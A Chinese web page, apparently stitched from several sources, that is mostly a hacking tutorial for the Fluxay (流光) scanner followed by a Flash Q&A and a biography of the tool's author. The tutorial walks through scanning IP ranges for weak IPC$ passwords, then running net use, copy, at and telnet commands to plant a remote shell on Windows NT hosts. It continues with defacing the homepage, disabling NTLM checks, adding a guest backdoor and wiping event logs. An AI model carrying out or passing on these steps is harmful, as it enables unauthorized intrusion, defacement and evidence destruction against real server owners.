铃铛号将会介绍流光软件,有相关烦恼的人,就请继续看下去吧。

“流光”是怎样的软件 ?

流光的破解可分为5大部分:

一、POP3/FTP/…探测

二、IPC探测

三、SQL探测

四、高级扫描

五、其它 …

因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:)

流光的IPC探测:

一、目的和任务:

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。

2、学习IPC探测的相关知识。

二、探测流程:

1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

什么是IPC:

IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。

IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。

注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的 :)填入IP,选择扫描NT/98主机

4、探测中……

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样)

有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办么? :)有的是 !自己看看工具-菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

黑了他 !

开个dos prompt 执行如下命令,本次用的例子如下图。

1、 net use \\对方ip\ipc$ "密码" /user:"用户名" || 建立远程连接

2、 copy icmd.exe \\对方ip\admin$ || admin$是对方的winnt目录 :) 这里文件多。

3、 net time \\对方IP || 看看对方的本地时间

4、at \\对方ip 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

5、 telnet 对方ip 端口 ||

6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||

7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe

如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .

假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot

下面的图有演示

8、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:

执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

9、还能做成其他的么 ?

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,快、空间无限,嘿嘿 :)

10、日志清除,断开连接 :

执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use \\ip\ipc$ /delete

那个做流光字的软件比较好用、安全?

Macromedia flash8.0

这个是做动画的专门软件,几乎可以做出任何你想要的字体图片

流光的作者小榕的真名叫什么,是什么大学毕业的?有认识他或者和他大学校友的么?

小榕 小榕

网名:小榕

性别:男

年纪:37

婚姻:已婚

资力:中国CAD/CAM协会会员,高级程序员

格言:无论在现实或是网络中,我都是孤独的……

黑客原则:不能仇视社会,不能给别人制造麻烦,不能给别人带来损失。有人对黑客这样评价:黑客是一种不断研究不断探索的境界。

============================================================

无可否认,小榕永远是中国黑客/安全界的骄傲!

小榕,1972年出生,据小榕自己说,他从小就是一个调皮的家伙,看看他的自我介绍:

小学三年级因倒卖指南针(我一毛钱买进,一块钱卖出),被学校警告。

小学六年级给同班女同学写情书,未果。

初一曾经在夜里披着草席爬进公厕(男厕),把一个正在出恭的老头吓得失足……

初二第一次约女同学看电影《斯巴达克斯》,中途被告知“恐怖”,女同学提前退场,我一个人坚持看完了电影。

初二加入了中国篆刻家协会。

初三因为拆自行车零件(别人的)被派出所护送回家。

高一和小混混一块寻衅滋事被街道派出所传唤一次,也是在那个时候学会了吸烟。

进入了一所树没草高、男比女多的工科大学。

大一上学期高等数学上册补考一次。

大一下学期高等数学上册再补考一次。

大一下学期普通物理补考一次。

毕业前普通物理再补考一次。

加入了中国CAD/CAM协会。

最后以“排名30名,本班共31人”(《毕业推荐书》上的原话)的成绩毕业。

1996年第一次上网。

1997年春节第一次破解了别人的账号

1997年夏天和别人打架,脸上留下了永远的痕迹

1998年通过了高级程序员水平考试

1999年开始写扫描/破解类软件

至今还在哭泣……

===========================================================

呵呵,不管怎么说,小榕无庸质疑是国内目前的顶级黑客,他开发的流光软件是众多小“黑客”必用的软件之一。

父亲(已去世)是大学教授的小榕,对黑客的道德观认识得很清楚:黑客像美国西部开发时的牛仔,没有法律的约束,但却有自己的做事准则。黑客要有道德底线,小榕的三条做黑客原则:不能仇视社会,不能给别人制造麻烦,不能给别人带来损失。有人对黑客这样评价:黑客是一种不断研究不断探索的境界。

小榕的工具是因为一个扫描工具。"流光"许多接触过黑客工具的无一不知道小榕的。

小榕说,“通往电脑的道路不只一条,就看你怎么走”。 “只要我敲键盘的足够快,可以一天黑掉100个网站”小榕曾经在一个月里进入1000家网站,并找出其中的漏洞。小榕的名字在网上非常响亮,这倒不是因为他黑过谁,而是因为他发布了许多杀伤力巨大而又及易上手Hack工具。小榕轻易不出刀,他只负责提供刀具。

呵呵,但不管怎么说,小榕无庸质疑的是国内目前的顶级黑客,他开发的流光软件是众多小“黑客”必用的软件之一。